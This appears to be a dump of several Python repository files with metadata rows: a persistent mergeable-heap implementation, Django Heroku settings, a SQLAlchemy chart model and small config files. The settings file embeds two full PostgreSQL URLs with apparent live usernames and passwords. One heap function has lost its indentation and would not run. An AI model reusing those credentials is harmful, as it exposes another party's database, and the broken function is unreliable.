        sf = super(__class__, cls).__new__(cls, _key_func, _lt, _reverse, _node)
        # '' is just a cheap empty default iterable
        iterable = '' if iterable is None else iterable
        sf._key_func
        #bug:sf = sf.ipushs(iterable)
        sf, _ = sf.ipushs(iterable)
        # (bare attribute probes: fail fast if the property is broken)
        sf._key_func
        return sf
    # underscore-named views over the 'X'-prefixed namedtuple fields
    # (namedtuple forbids underscore field names)
    @property
    def _key_func(sf, /):
        return sf.Xkey_func
    @property
    def _lt(sf, /):
        return sf.Xlt
    @property
    def _reverse(sf, /):
        return sf.Xreverse
    @property
    def _node(sf, /):
        return sf.Xnode
    # class-body references: raise NameError at class-creation time if a
    # property above is missing/misnamed
    _key_func
    _lt
    _reverse
    _node
    def _return(sf, root, result, /):
        # common tail of every "i"-operation: wrap the new root + result
        new = sf._mk5new_root(root)
        return new, result
    def _mk5new_root(sf, root, /):
        # O(1): only the root field changes; configuration is shared
        assert isinstance(root, _MHNodeTypes)
        ot = sf._replace(Xnode=root)
        assert type(sf) is type(ot)
        return ot
    def iclear(sf, /):
        '-> (empty_heap, None)'
        root = _empty_node
        return sf._return(root, None)
    def ipushs(sf, iterable, /):
        '-> (new_heap, None) #push all payloads of `iterable`'
        root = _pushs(sf, sf._node, iterable)
        return sf._return(root, None)
    def iter_ipops(sf, /):
        '''yield payloads in sorted order; consumes only the local
        binding `sf` — the original heap object is untouched.'''
        while sf:
            sf, min_payload = sf.ipop()
            yield min_payload
        return
    def ipop_then_push(sf, payload, /):
        '-> (new_heap, old_min_payload)'
        min_payload, root = _pop_then_push(sf, sf._node, payload)
        return sf._return(root, min_payload)
    def ipush_then_pop(sf, payload, /):
        '-> (new_heap, min_payload) #may return `payload` itself'
        min_payload, root = _push_then_pop(sf, sf._node, payload)
        return sf._return(root, min_payload)
    def ipop(sf, /):
        '-> (new_heap, min_payload)|raise HeapError__Empty'
        min_payload, root = _pop(sf, sf._node)
        return sf._return(root, min_payload)
    def ipush(sf, payload, /):
        '-> (new_heap, None)'
        root = _push(sf, sf._node, payload)
        return sf._return(root, None)
    def imerge(sf, other_heap, /):
        '''-> (union_heap, None)
        Both heaps must share the exact same ordering configuration.'''
        if not isinstance(other_heap, __class__):raise TypeError
        if not sf._lt is other_heap._lt:raise TypeError
        if not sf._key_func is other_heap._key_func:raise TypeError
        if not sf._reverse is other_heap._reverse:raise TypeError
        root = _eat(sf, sf._node, other_heap._node)
        return sf._return(root, None)
    def __or__(sf, other_heap, /):
        'non-destructive union'
        union, _ = sf.imerge(other_heap)
        return union
    def copy(sf, /):
        'O(1)'
        # immutable value: the object itself is its own copy
        return sf
class MergeableHeap(_MergeableHeap__mixin):
    '''Mutable front-end: wraps a persistent MergeableHeap__immutable_tree
    in the single slot `_heap` and rebinds it after every operation
    (see `_fwd`).  Sharing the persistent tree makes `copy()` O(1).
    '''
    __slots__ = '_heap'.split()
    def __init__(sf, iterable=None, /, *, key=None, __lt__=None, reverse=False):
        sf._heap = MergeableHeap__immutable_tree(iterable, key=key, __lt__=__lt__, reverse=reverse)
        # bare probe: fail fast if the forwarding property is broken
        sf._key_func
    def copy(sf, /):
        'O(1)'
        # default-construct, then share the persistent tree (which also
        # carries the ordering configuration)
        new = type(sf)()
        new._heap = sf._heap
        return new
    # configuration/state forwarded from the wrapped persistent heap
    @property
    def _key_func(sf, /):
        return sf._heap._key_func
    @property
    def _lt(sf, /):
        return sf._heap._lt
    @property
    def _reverse(sf, /):
        return sf._heap._reverse
    @property
    def _node(sf, /):
        return sf._heap._node
    # class-body references: raise NameError at class-creation time if a
    # property above is missing/misnamed
    _key_func
    _lt
    _reverse
    _node
    def _fwd(sf, f, /, *args, **kwargs):
        # run an "i"-operation `f`, keep its new heap, return its result
        sf._heap, result = f(*args, **kwargs)
        return result
    def clear(sf, /):
        return sf._fwd(sf._heap.iclear)
    def pushs(sf, iterable, /):
        'push all payloads of `iterable`; O(logN+M+logM)'
        return sf._fwd(sf._heap.ipushs, iterable)
    def iter_pops(sf, /):
        'destructively yield payloads in sorted order'
        while sf:
            yield sf.pop()
        return
    def pop_then_push(sf, payload, /):
        '-> old min_payload'
        return sf._fwd(sf._heap.ipop_then_push, payload)
    def push_then_pop(sf, payload, /):
        '-> min_payload (may be `payload` itself)'
        return sf._fwd(sf._heap.ipush_then_pop, payload)
    def pop(sf, /):
        '-> min_payload|raise HeapError__Empty'
        return sf._fwd(sf._heap.ipop)
    def push(sf, payload, /):
        return sf._fwd(sf._heap.ipush, payload)
    def merge(sf, other_heap, /):
        'non-destructive for `other_heap`; O(logN+logM)'
        if not isinstance(other_heap, __class__):raise TypeError
        #bug:return sf._fwd(sf._heap.imerge, other_heap)
        return sf._fwd(sf._heap.imerge, other_heap._heap)
    def __or__(sf, other_heap, /):
        'non-destructive union of two heaps'
        new = sf.copy()
        new.merge(other_heap)
        return new
    def eat(sf, other_heap, /):
        'heap.eat(std::move(heap))'
        # destructive merge: `other_heap` is emptied afterwards
        if sf is other_heap: raise HeapError__EatSelf
        sf.merge(other_heap)
        other_heap.clear()
        return None
def _pop(sf, root, /):
    '''Pop the minimum payload off the tree (checked wrapper).
    -> (min_payload, root)|raise HeapError__Empty
    '''
    old_size = root.size
    old_height = root.height
    (min_payload, new_root) = _pop_(sf, root)
    # exactly one payload removed; the tree shrinks by at most one level
    assert new_root.size == old_size-1
    assert old_height-1 <= new_root.height <= old_height
    return (min_payload, new_root)
def _pop_(sf, root, /):
    '''Two-step pop: detach the deepest unit node, then re-insert its
    payload via push-then-pop so the true minimum comes out instead.
    -> (min_payload, root)
    '''
    (spare_unit, shrunk_root) = _pop__deepest_unit(sf, root)
    #bug(fixed): was `_pop_then_push(sf, root, removed_unit.payload)`
    return _push_then_pop(sf, shrunk_root, spare_unit.payload)
def _pop__deepest_unit(sf, root, /):
    '''Detach one unit node from the deepest level of the tree.
    -> (deepest_unit, root)|raise HeapError__Empty
    Following `large_child` ends at a height-1 unit; its parent (if any)
    has two unit children (asserted below), so collapsing the parent into
    the sibling keeps the tree balanced.
    '''
    if root.is_empty: raise HeapError__Empty
    # path from the root down to the deepest unit
    ls = [root]
    while not ls[-1].is_unit:
        ls.append(ls[-1].large_child)
    if not ls: raise logic-err
    removed_unit = ls.pop()
    assert removed_unit.height == 1
    if ls:
        #bug:_replace_child(ls[-1], removed_unit, _empty_node)
        # the parent fork collapses into the removed unit's sibling
        removed_fork = ls.pop()
        assert removed_fork.lhs_child.is_unit
        assert removed_fork.rhs_child.is_unit
        another_unit = removed_fork.another_child_of(removed_unit)
        root = _replace_child_and_fresh_nodes(sf, ls, removed_fork, another_unit)
        deepest_unit = removed_unit
    else:
        # the whole tree was a single unit; it becomes empty
        assert root.is_unit
        deepest_unit = root
        root = _empty_node
    return (deepest_unit, root)
def _push_then_pop(sf, root, payload, /):
    '''Push `payload`, then pop the minimum — without growing the tree.
    -> (min_payload, root)  #min_payload may be `payload` itself
    '''
    # empty heap: the pushed payload is immediately the popped minimum
    if root.is_empty:
        return payload, root
    assert root.height
    if sf._lt__payload(root.min_payload, payload):
        # the current minimum is strictly smaller: it gets popped and
        # `payload` takes its slot
        return _pop_then_push(sf, root, payload)
    # `payload` itself is the (non-strict) minimum: the tree is unchanged
    return payload, root
def _pop_then_push(sf, root, payload, /):
    '''Remove the current minimum, then insert `payload` where it sat.
    -> (min_payload, root)
    Requires a non-empty tree; the tree shape is unchanged.
    '''
    assert root.height > 0
    min_payload = root.min_payload
    # descend along the chain of nodes sharing the cached minimum object
    path = [root]
    while not path[-1].is_unit:
        path.append(path[-1].the_min_payload_child)
    min_unit = path.pop()
    assert min_unit.height == 1
    assert min_unit.payload is min_payload
    replacement = _MHNodeUnit(payload)
    new_root = _replace_child_and_fresh_nodes(sf, path, min_unit, replacement)
    return min_payload, new_root
def _mk(sf, payloads, /):
    '''Build a balanced heap tree from an iterable of payloads; O(M).
    -> root
    Bottom-up pairing: wrap every payload in a unit node, then repeatedly
    combine adjacent nodes pairwise until at most one root remains.  The
    bracketed comments track node heights to show balance is preserved.
    '''
    ls = [*map(_MHNodeUnit, payloads)]
    L = len(ls)
    while len(ls) > 1:
        #INVARIANT: assert all(0 <= ls[-1].height - node.height <= 1 for node in ls[:-1])
        #   let H := ls[0].height
        #   [ls[?].height == H]
        #   [H <= ls[-1].height <= H+1]
        assert 0 <= ls[-1].height - ls[-2].height <= 1
        #bug:xs = [_MHNode(sf._lt__node, ls[i], ls[i+1]) for i in range(0, len(ls), 2)]
        xs = [_MHNode(sf._lt__node, ls[i], ls[i+1]) for i in range(0, len(ls)-1, 2)]
        #   [xs[?].height == H+1]
        #   [H+1 <= xs[-1].height <= H+2]
        #   [[xs[-1].height == H+2] <-> [[ls[-1].height == H+1][len(ls)%2==0]]]
        if len(ls)&1:
            # odd count: ls[-1] was not consumed by the pairing above
            # !! [[xs[-1].height == H+2] <-> [[ls[-1].height == H+1][len(ls)%2==0]]]
            # !! [len(ls)%2=!=0]
            #   [xs[-1].height =!= H+2]
            #   [xs[-1].height == H+1]
            #bug:xs.append(ls[-1])
            if ls[-1].height < xs[-1].height:
                # !! [H <= ls[-1].height <= H+1]
                # !! [xs[-1].height == H+1]
                # !! [ls[-1].height < xs[-1].height]
                #   [ls[-1].height == H] — absorb it into the last pair
                xs[-1] = _MHNode(sf._lt__node, xs[-1], ls[-1])
                #   [xs[-1].height == H+2]
                #   [xs[?].height == H+1]
            else:
                # !! [H <= ls[-1].height <= H+1]
                # !! [not [ls[-1].height < xs[-1].height]]
                # !! [xs[-1].height == H+1]
                #   [ls[-1].height == H+1] — same level; carry it over
                xs.append(ls[-1])
                #   [xs[-1].height == H+1]
                #   [xs[?].height == H+1]
        # [H+1 <= xs[-1].height <= H+2]
        # [xs[?].height == H+1]
        ls = xs
        # [H+1 <= ls[-1].height <= H+2]
        # [ls[?].height == H+1]
    if not ls:
        root = _empty_node
    else:
        [root] = ls
    assert root.size == L
    return root
def _pushs(sf, root, payloads, /):
    """Insert every payload in *payloads*; return the new root."""
    other = _mk(sf, payloads)
    return _eat(sf, root, other)
def _push(sf, root, payload, /):
    """Insert a single *payload*; return the new root."""
    return _eat(sf, root, _MHNodeUnit(payload))
def _replace_child_and_fresh_nodes(sf, ancestors, old_child, new_child, /):
    """Rebuild the chain of *ancestors* (root first) after swapping one child.

    Walking from the deepest ancestor upward, each ancestor is replaced by a
    fresh node whose affected child slot points at the rebuilt subtree.
    The *ancestors* list is updated in place; the fresh root is returned.
    If *ancestors* is empty, *new_child* itself is the root.
    """
    for i in range(len(ancestors) - 1, -1, -1):
        stale = ancestors[i]
        fresh = _replace_child(sf, stale, old_child, new_child)
        ancestors[i] = fresh
        old_child, new_child = stale, fresh
    return new_child
def _replace_child(sf, parent, old_child, new_child, /):
    """Return a fresh copy of *parent* with *old_child* swapped for *new_child*.

    Raises:
        AssertionError: if *old_child* is neither child of *parent*
            (a logic error in the caller).
    """
    assert not new_child.is_empty
    lhs_child, rhs_child = parent.children
    if parent.lhs_child is old_child:
        lhs_child = new_child
    elif parent.rhs_child is old_child:
        rhs_child = new_child
    else:
        # Bug fix: was `raise logic-err`, which evaluated the expression
        # `logic - err` and raised NameError; raise a meaningful error instead.
        raise AssertionError('old_child is not a child of parent')
    return _MHNode(sf._lt__node, lhs_child, rhs_child)
def _eat(sf, lhs_root, rhs_root, /):
    """Merge two heaps and return the new root (O(log M) algorithm).

    Sanity-checks that the merged size is exact and the height grows by
    at most one.
    """
    expected_size = lhs_root.size + rhs_root.size
    max_height = max(lhs_root.height, rhs_root.height)
    merged = _eat_(sf, lhs_root, rhs_root)
    assert merged.size == expected_size
    assert max_height <= merged.height <= max_height + 1
    return merged
def _eat_(sf, lhs_root, rhs_root, /):
    """Merge implementation for `_eat`: graft the shorter heap onto the taller.

    Descends the taller heap along `small_child` until reaching a subtree no
    taller than the shorter heap, joins the two there, then rebuilds the
    chain of ancestors.
    """
    # Order the two roots so rhs_root is the shorter (or equal) one.
    (rhs_root, lhs_root) = sorted([rhs_root, lhs_root], key=_get_height4node)
    if rhs_root.is_empty:
        #[rhs_root is lhs_root is _empty_node] is OK
        return lhs_root
    if 0:
        # Dead code, deliberately disabled: self-merge detection.
        if rhs_root is lhs_root:
            #[rhs_root is lhs_root is not _empty_node] is bug
            raise HeapError__EatSelf
    assert 1 <= rhs_root.height <= lhs_root.height
    # Descend the taller heap until the current subtree is short enough.
    ls = [lhs_root]
    while ls[-1].height > rhs_root.height:
        ls.append(ls[-1].small_child)
    removed_subtree = ls.pop()
    assert removed_subtree.height <= rhs_root.height
    assert not ls or 1 <= ls[-1].height - removed_subtree.height <= 2
    assert not ls or 1 <= ls[-1].height - rhs_root.height <= 2
    assert 0 <= rhs_root.height - removed_subtree.height <= 1
    if removed_subtree.is_empty:
        # The descent ended at an empty slot: attach rhs_root directly.
        assert removed_subtree.height == 0 < 1 <= rhs_root.height <= lhs_root.height
        assert ls
        assert 1 == rhs_root.height < ls[-1].height == 2
        new_node = rhs_root
    else:
        # Join the removed subtree with the shorter heap under a new node.
        new_node = _MHNode(sf._lt__node, removed_subtree, rhs_root)
    assert not ls or 0 <= ls[-1].height - new_node.height <= 1
    # small_child ==>> [0 <= ls[-1].another_child<removed_subtree>.height - removed_subtree.height <= 1]
    # [rhs_root.height >= removed_subtree.height] ==>> [new_node.height == rhs_root.height+1 > removed_subtree.height]
    # [rhs_root.height < ls[-1].height] ==>> [new_node.height <= ls[-1].height]
    # [removed_subtree.height < ls[-1].another_child<removed_subtree>.height <= new_node.height <= ls[-1].height]
    # 『==』==>>_fresh_nodes
    root = _replace_child_and_fresh_nodes(sf, ls, removed_subtree, new_node)
    return root
def _unorder_iter_payloads5root(root, /):
    """Yield every payload stored under *root*, in no particular order."""
    return (node.payload
            for node in _unorder_iter_nodes5root(root)
            if node.is_unit)
def _unorder_iter_nodes5root(root, /):
ls = [root]
while ls:
node = ls.pop()
if not node.is_empty:
yield node
ls.append(node.rhs_child)
ls.append(node.lhs_child)
def _node_as_tree(root, /):
    """Convert the node graph under *root* into nested plain tuples.

    tree = () | (payload, lhs_tree, rhs_tree)

    Phase 1 flattens the nodes to *xs* in preorder (left child first);
    phase 2 consumes *xs* in reverse, reusing *ls* as a stack of already
    built child trees.
    """
    xs = []
    ls = [root]
    while ls:
        node = ls.pop()
        xs.append(node)
        if not node.is_empty:
            ls.append(node.rhs_child)
            ls.append(node.lhs_child)
    #xs = [root, root.lhs_child, ..., root.rhs_child, ...]
    # ls is now empty; phase 2 reuses it as the tree stack.
    while xs:
        node = xs.pop()
        if node.is_empty:
            tree = null_tuple
        else:
            # The two child trees were pushed earlier: lhs on top of rhs.
            children = []
            children.append(ls.pop())
            children.append(ls.pop())
            assert len(children)==2
            tree = (node.min_payload, *children)
        ls.append(tree)
    [tree] = ls
    return tree
if __name__ == "__main__":
    # Run the module's doctests when executed as a script.
    import doctest
    doctest.testmod()
| [
"wuming_zher@zoho.com.cn"
] | wuming_zher@zoho.com.cn |
9636c810b69765d56b8a06b0152aac218b6558fb | 140351f0a75aaaef1949c80ef5ceaa2da22a726f | /pysite/extra_heroku_end_settings.py | f7d143e8000b48ef9182618c4ef18baf8cfd1fc5 | [] | no_license | ashish2/djApps | 69005a2b48d859772fff989ed432d274d113a823 | 4f7f28d130d998a902593602a10fa6723b7305e7 | refs/heads/master | 2016-08-12T03:18:28.009964 | 2016-02-24T12:19:37 | 2016-02-24T12:19:37 | 47,876,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | import os
from settings import DATABASES

# Settings at the End
### Settings for Heroku
import dj_database_url

#DATABASES['default'] = dj_database_url.config(default=os.environ.get('DATABASE_URL'))
heroku_pg_url = 'postgres://ivvmabgfrysfgo:hJJ_2qRdime4SRRH9AeiY-GqYz@ec2-50-17-207-54.compute-1.amazonaws.com:5432/df4n1vasgl12gv'
# NOTE: the assignment below overrides the URL above; the second database
# is the one actually used for this app.
heroku_pg_url = "postgres://ezvnjwuahvqkbn:0EcFmNpePt3ARLBAOjiyDH9rwx@ec2-54-204-35-207.compute-1.amazonaws.com:5432/d6lgoemjjf1emo"
# New For this app
#HEROKU_POSTGRESQL_PUCE_URL
#postgresql-reticulated-9660
#DATABASES = {'default': dj_database_url.config(default=heroku_pg_url)}
DATABASES['default'] = dj_database_url.config(default=heroku_pg_url)

# honor the 'x_forwarded_proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')

# Allow all host headers.
# Bug fix: Django reads the setting ALLOWED_HOSTS; the original name
# ALLOW_HOST was a typo and had no effect.
ALLOWED_HOSTS = ['*']

# Static asset configuration
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
#STATIC_ROOT = 'staticfiles'
#STATIC_ROOT = 'static_root'
#STATIC_URL = '/static/'
current_dir = os.path.dirname( __file__ )
STATICFILES_DIRS = (
    os.path.join(BASE_DIR, 'static'),
    current_dir,
)
| [
"vickyojha2@yahoo.com"
] | vickyojha2@yahoo.com |
b56f2969e543d5827dc089cd6dcd23d2f694d788 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_chomps.py | b371d13ce61f330b9635ad464a74c0b37a02a7dd | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py |
from xai.brain.wordbase.verbs._chomp import _CHOMP
# class header
class _CHOMPS(_CHOMP, ):
    """Word entry for the verb form "CHOMPS" (base form "chomp")."""

    def __init__(self,):
        _CHOMP.__init__(self)
        self.name = "CHOMPS"      # canonical display name of this form
        self.specie = 'verbs'     # word category
        self.basic = "chomp"      # base (lemma) form
        self.jsondata = {}        # extra metadata; empty by default
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
de81742251cf7ecbf57753936bfec1cccd7b5c38 | 1aba70d53d9f2ace50821ead9958e18d23cbfb0c | /app/mysite/models/charts_model.py | 0161f4d89e6dfc72308be90e27ad3ae7e8a05bb9 | [] | no_license | Danny19880402/mysite | 6e567593e47486100f623e99b8dadaa8d0419456 | 5c82810f75360d5ad40bf299a8be12ce7eff2112 | refs/heads/master | 2023-01-06T14:04:29.359774 | 2019-07-06T12:40:34 | 2019-07-06T12:40:34 | 195,534,587 | 1 | 0 | null | 2023-01-04T03:49:04 | 2019-07-06T11:59:49 | Vue | UTF-8 | Python | false | false | 455 | py | from mysite import db
class Chartsmodel(db.Model):
    """SQLAlchemy model for one trade record in table ``chart_details``."""
    __tablename__ = 'chart_details'
    __table_args__ = {'mysql_engine': 'InnoDB'}  # InnoDB supports transactions and foreign keys
    # Primary key
    id = db.Column(db.Integer, primary_key=True)
    # Price (doc string kept in Chinese: 价格)
    price = db.Column(db.Float, doc='价格', nullable=False)
    # Quantity (数量)
    volume = db.Column(db.Float, doc='数量', nullable=False)
    # Time of the deal (成交时间)
    dealTime = db.Column(db.DateTime, doc='成交时间', nullable=False)
| [
"duxuede1988@163.com"
] | duxuede1988@163.com |
a024d712549319ead7d5ae7cb1d75ef40cfb79c6 | 72b71a584bc699da188772ae7240d6044d872e86 | /jusik/mypage/jusik/apps.py | 538a595277b415357545c460448a3727ba76648e | [] | no_license | heyoni/DjangoProject | 460e3cc2a7126e5c78bd9bf45791d25c09fc2b31 | a9dffd2d3dd6665984f4729e3eff30167002e6ac | refs/heads/master | 2023-08-29T04:07:42.222331 | 2021-10-13T14:34:18 | 2021-10-13T14:34:18 | 327,337,049 | 0 | 1 | null | 2021-10-06T14:10:49 | 2021-01-06T14:31:25 | Python | UTF-8 | Python | false | false | 85 | py | from django.apps import AppConfig
class JusikConfig(AppConfig):
    """Django application configuration for the ``jusik`` app."""
    name = 'jusik'
| [
"hhheyoni@gmail.com"
] | hhheyoni@gmail.com |
5ccb4dbf3827407afe7f4a7dbc3bc34ea0c28322 | 36da0543e6f3895dd0879e34f63642238400532c | /authorities/urls.py | 118e149e58d03b40750cb2ab3c6c5b5aee31b8fe | [] | no_license | chengfangang/django_auth | 3ecb93cabc50de007c736cfb0961298f19078cc3 | a7846627c34ee50548f17250dc62acefcac1311a | refs/heads/master | 2021-08-08T01:29:38.570387 | 2017-11-07T21:16:24 | 2017-11-07T21:16:24 | 110,074,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | """django_auth URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from .views import appsettings

urlpatterns = [
    # Bug fix: Django matches URL patterns against the path with the
    # leading slash stripped, so a pattern beginning with '/' can never
    # match.  Anchor with '^' instead.
    url(r'^appsettings/$', appsettings),
]
| [
"chengfangang@etongdai.com"
] | chengfangang@etongdai.com |
5ce0af09173a46398d227ccbc5d3c1eb9b6bb19c | 2a807b5763465b1566bc3f24146d6fd81d8a5bd3 | /python_para_android_ios_win_linux_mac/03_tomada_de_decisao/exercicio12.py | 6c0d125bb2404157d5eab59e4b9e6c58b12c77f8 | [] | no_license | rafaelrsanches/cursos_python | 8fbebf81a84242d762923ff8257f17ec3b2c6ec9 | f52a6df977babd9df01d560f7a3c112d0a3e2b32 | refs/heads/master | 2020-03-25T22:13:10.608625 | 2018-12-14T23:44:12 | 2018-12-14T23:44:12 | 144,211,018 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | # Faça um algoritmo que peça um valor numérico. Em seguida, verifique se o número é inteiro ou decimal.
num = float(input("Digite um valor numérico: "))
if num % 1 == 0:
print("O valor é um número inteiro!")
else:
print("O valor é um número decimal!")
| [
"rafael.rsanches96@gmail.com"
] | rafael.rsanches96@gmail.com |
90ceac38ceff608f92ae59f32d3a70d07fa83eeb | df30f97d316e899b07b223bc86cfe53345627f06 | /problems/baek/13460_구슬탈출2.py | 865933d4fd8f95d6c035b5044bd340af67f6b81f | [] | no_license | GH-Lim/AlgorithmPractice | c6a3aa99fa639aa23d685ae14c1754e0605eaa98 | e7b8de2075348fb9fcc34c1d7f211fdea3a4deb0 | refs/heads/master | 2021-06-18T17:21:10.923380 | 2021-04-18T03:43:26 | 2021-04-18T03:43:26 | 199,591,747 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | from collections import deque
# Board dimensions: N rows by M columns.
N, M = map(int, input().split())
board = [list(input()) for _ in range(N)]
# Locate the red ball (R), the blue ball (B) and the hole (O).
# The border cells are walls, so only the interior is scanned.
R = (0, 0)
B = (0, 0)
O = (0, 0)
for i in range(1, N - 1):
    for j in range(1, M - 1):
        if board[i][j] == 'R':
            R = (i, j)
        elif board[i][j] == 'B':
            B = (i, j)
        elif board[i][j] == 'O':
            O = (i, j)
# Direction deltas: up, down, left, right.
dy = [-1, 1, 0, 0]
dx = [0, 0, -1, 1]
# States (red_pos, blue_pos) already expanded by the BFS.
visited = {}
def bfs(R, B):
    """Breadth-first search over (red, blue) position pairs.

    Returns the minimum number of board tilts (at most 10) needed to
    drop the red ball into the hole, or -1 if it cannot be done.
    """
    q = deque([(R, B)])
    for cnt in range(1, 11):  # the game allows at most 10 tilts
        for _ in range(len(q)):  # process one BFS level per tilt count
            r, b = q.popleft()
            visited[(r, b)] = 1  # mark the state when dequeued
            for d in range(4):  # try tilting in each of the 4 directions
                beads = move(r, b, d)
                if beads and beads[0] == O:  # red ball fell into the hole
                    return cnt
                if beads and beads not in visited:
                    q.append(beads)
    return -1
def move(r, b, d):
    """Tilt the board in direction *d*: roll red, then blue, until a wall.

    Returns the new ``((ry, rx), (by, bx))`` positions, or ``False`` when
    the blue ball falls into the hole (an illegal move).
    """
    ry, rx = r
    by, bx = b
    r_cnt = 0  # how many cells the red ball rolled
    b_cnt = 0  # how many cells the blue ball rolled
    while board[ry + dy[d]][rx + dx[d]] != '#':
        r_cnt += 1
        ry += dy[d]
        rx += dx[d]
        if (ry, rx) == O:  # red may stop in the hole (winning condition)
            break
    while board[by + dy[d]][bx + dx[d]] != '#':
        b_cnt += 1
        by += dy[d]
        bx += dx[d]
        if (by, bx) == O:  # blue in the hole invalidates the move
            return False
    if (ry, rx) == (by, bx):
        # Both balls cannot share a cell: the one that rolled farther
        # arrived second, so it backs up one cell.
        if r_cnt > b_cnt:
            ry -= dy[d]
            rx -= dx[d]
        else:
            by -= dy[d]
            bx -= dx[d]
    r = ry, rx
    b = by, bx
    return r, b
# Minimum number of tilts to win, or -1 if impossible.
print(bfs(R, B))
| [
"gunhyuck11@naver.com"
] | gunhyuck11@naver.com |
c4387e96c598bb7541d03f278120c1dd682176cb | 99d65074c1614eb2966465b145d57e1d80914139 | /Condition.py | f6233a88e58138358d9b9be1a51c64b2f7a43336 | [] | no_license | prtptl/Data-Science | 80db9aafd55a693cab48f1b68906b1936af2b6c8 | 33ff92e19f8d78234e11969147bf9abcf38b006f | refs/heads/master | 2020-04-20T02:35:14.600700 | 2019-01-31T20:14:48 | 2019-01-31T20:14:48 | 168,575,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | #!/usr/bin/env python
# coding: utf-8
# In[3]:
import math
#area=input("Enter the area")
# In[4]:
#type(area)
# In[15]:
# Read the circle's area from the user as a float.
area=float(input("Enter the area"))
# In[16]:
# No-op outside a REPL: the result of type() is discarded.
type(area)
# In[18]:
# Derive the radius from area = pi * r**2.
if area>0:
    radius=math.sqrt(area/math.pi)
    print("the radius is", radius)
else:
    print("Enter positive number")
# In[21]:
# Demonstrate if/elif/else branching on the computed radius.
if radius>5:
    diameter=2*radius
    print("diameter is", diameter)
elif radius>4:
    print("you are in elif")
else:
    print("Error")
# ### for loop
# In[34]:
for i in range(1,4):
    print("Hello")
# In[35]:
# No-op: creates a range object and discards it (leftover REPL cell).
range(i)
# ### while loop
# In[37]:
# Count down from 5 to 2.
counter=5
while counter>1:
    print(counter)
    counter=counter-1
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
b3ff2dc9e5cecb1e83a1e6e6cd93011b6a4465a7 | d09ea6c980275f741d607a218fb3d23a9e7184d5 | /happy_tree/solver.py | 9e8298102198fab963c6dddbfa5c19795d6d415c | [] | no_license | galli-leo/tctf2020 | 1aadb5484407ad0e3190d7c01e96b4dc9b40418a | 257ac6cdff3f44068fc9973fc189b6f9c6c365b8 | refs/heads/master | 2022-11-07T21:49:42.770348 | 2020-07-03T15:40:18 | 2020-07-03T15:40:18 | 276,872,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | from numpy import uint32
def check(flag):
loc_7 = uint32(flag)
vals = {}
for i in range(0x186a0):
tmp1 = uint32(loc_7 << 0xd) # 0x56582884
tmp2 = uint32(tmp1 ^ loc_7) # 0x56586f00
tmp3 = uint32(tmp2 >> 0x11) # 0x5657e20c
tmp4 = uint32(tmp3 ^ tmp2) # 0x56586cf8
tmp5 = uint32(tmp4 << 5) # 0x56583590
tmp6 = uint32(tmp5 ^ tmp4) # 0x56586c58
loc_7 = tmp6
# if loc_7 in vals:
# print("repeated at: ", i, tmp1, tmp2, tmp3, tmp4, tmp5)
# print(vals[loc_7])
# idx = i
# vals[tmp1] = (idx, "tmp1")
# vals[tmp2] = (idx, "tmp2")
# vals[tmp3] = (idx, "tmp3")
# vals[tmp4] = (idx, "tmp4")
# vals[tmp5] = (idx, "tmp5")
# vals[loc_7] = (idx, "loc_7")
return loc_7
def check2(flag):
loc_7 = flag
vals = {}
for i in range(0x186a0):
tmp1 = loc_7 << 0xd # 0x56582884
tmp2 = (tmp1 ^ loc_7) # 0x56586f00
tmp3 = (tmp2 >> 0x11) # 0x5657e20c
tmp4 = (tmp3 ^ tmp2) # 0x56586cf8
tmp5 = (tmp4 << 5) # 0x56583590
tmp6 = (tmp5 ^ tmp4) # 0x56586c58
loc_7 = tmp6
# if loc_7 in vals:
# print("repeated at: ", i, tmp1, tmp2, tmp3, tmp4, tmp5)
# print(vals[loc_7])
# idx = i
# vals[tmp1] = (idx, "tmp1")
# vals[tmp2] = (idx, "tmp2")
# vals[tmp3] = (idx, "tmp3")
# vals[tmp4] = (idx, "tmp4")
# vals[tmp5] = (idx, "tmp5")
# vals[loc_7] = (idx, "loc_7")
return loc_7 | [
"leonardo.galli@bluewin.ch"
] | leonardo.galli@bluewin.ch |
37ff219abc5a713483b7f6bfffc7ffcae2e5104d | bbc3ff5dc623774d8cd4e8d8154da353b7523552 | /Lambda_double.py | 11c687a55b041ebac4ec0aece9d8286dd0a4b7b0 | [] | no_license | millanmilu/Learn-Python | e78b562e212fb1854322e726f5663c7f74d3b7f7 | ab5f55a86686d1c7bb5ccbe5201f4186ad8fdbc8 | refs/heads/master | 2020-04-13T20:01:01.892395 | 2019-01-05T14:18:34 | 2019-01-05T14:18:34 | 163,418,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | def my_fun(n):
return lambda a:a*n
mydouble = my_fun(2)
print(mydouble(11)) | [
"noreply@github.com"
] | noreply@github.com |
19225bced8ac87070dfd4bf7df8d4fe653fba6af | 0d59fa410624676908e1470fb9105cb8a280525c | /Algorithms/itertools/itertools_cycle.py | 779bb2629e1349e4c5d5978c5e075686ef194ad3 | [
"MIT"
